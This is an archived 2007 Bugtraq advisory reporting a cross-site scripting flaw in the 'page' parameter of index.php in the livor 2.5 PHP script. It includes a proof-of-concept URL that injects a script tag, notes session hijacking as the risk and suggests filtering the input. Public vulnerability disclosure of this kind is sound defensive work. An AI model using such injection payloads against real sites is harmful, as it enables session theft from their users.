lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 6 Apr 2007 08:51:39 -0000 From: rko.thelegendkiller@...il.com To: bugtraq@...urityfocus.com Subject: livor 2.5 Cross-Site Scripting Vulnerability /* livor 2.5 Cross-Site Scripting Vulnerability */ //Author: Arham Muhammad //Source: http://www.arizona-dream.com/Usa/Divers/scriptsphp/scripts/livor.zip //Vulnerable File: index.php //XsS: http://victim/path/index.php?page=//</script><script>alert(/xss/);</script> //Risk: Session Hijack //Fix: The Variable "page" Need To Be Properly Filtered To Avoid Cross-Site Scripting Attempt! //Greets: USMAN,tushy,Hackman,str0ke